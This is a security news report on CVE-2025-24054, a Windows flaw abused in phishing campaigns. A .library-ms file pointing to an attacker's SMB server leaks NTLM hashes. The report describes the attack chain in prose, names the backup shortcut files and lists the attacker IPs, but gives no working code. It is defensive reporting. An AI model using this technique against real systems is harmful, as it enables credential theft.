A vulnerability in Windows that exposes NTLM hashes via .library-ms files is currently being actively exploited by hackers in phishing campaigns targeting government agencies and private companies.
The vulnerability, designated CVE-2025-24054, was fixed in Microsoft’s March 2025 Patch Tuesday. Initially, it was not considered actively exploited and the risk was assessed as “less likely.” The vulnerability was reported by BleepingComputer.
However, researchers at Check Point reported that they saw active exploitation of CVE-2025-24054 just a few days after the patches became available. They saw a spike between March 20 and 25, 2025.
Attackers used a single IP address that specialists had previously linked to the Russian state-sponsored threat group APT28 (‘Fancy Bear’). However, this is insufficient evidence for the researchers to make a definitive attribution.
NTLM (New Technology LAN Manager) is a Microsoft authentication protocol. It uses a challenge-response method that uses hashes instead of plain passwords. Although NTLM does not send passwords in plain text, it is now considered insecure due to vulnerabilities such as replay attacks and hash cracking using brute force methods. Microsoft has therefore started to phase out NTLM in favor of Kerberos or Negotiate.
Phishing email with Dropbox link
In the attacks reported by Check Point, attackers sent phishing emails to organizations in Poland and Romania. The emails contained a Dropbox link to a ZIP archive. This archive contained a .library-ms file. A .library-ms file is a legitimate file type that, when opened, displays a Windows library containing files and folders from different sources.
In this phishing attack, the library-ms file was set up to point to a path on an external SMB server controlled by the attacker. When a ZIP file containing a .library-ms file is unzipped, Windows Explorer automatically responds, triggering the CVE-2025-24054 vulnerability. Windows then attempts to connect to the specified SMB server. During this connection, Windows attempts to authenticate itself via NTLM, allowing the attacker to intercept the user’s NTLM hashes.
In a later campaign, Check Point discovered phishing emails with direct attachments of .library-ms files. In this case, there was no ZIP archive. Downloading the .library-ms file was enough to trigger NTLM authentication to the external server. This showed that an archive file was not necessary to exploit the vulnerability.
Minimal user interaction is sufficient
Check Point reported that it discovered a global campaign on March 25, 2025, in which criminals distributed these files without them being contained in an archive. According to Microsoft, this vulnerability is already triggered by minimal user interaction with the malicious file. This could be a single click, opening the context menu, or any other action that does not involve opening or executing the file.
The malicious archive also contained three other files: ‘xd.url’, ‘xd.website’ and ‘xd.link’. These exploit older vulnerabilities related to the leakage of NTLM hashes and were presumably added as a backup method in case the library-ms approach fails.
According to Check Point, the attackers used SMB servers with the IP addresses 159.196.128[.]120 and 194.127.179[.]157.
Intercepting NTLM hashes can bypass authentication and gain elevated access privileges. Although CVE-2025-24054 is only rated as a medium-severity vulnerability, the consequences could be serious.
Given the limited interaction required to exploit the vulnerability, it is recommended to consider this a high risk. Organizations are advised to install the March 2025 updates and disable NTLM authentication if unnecessary.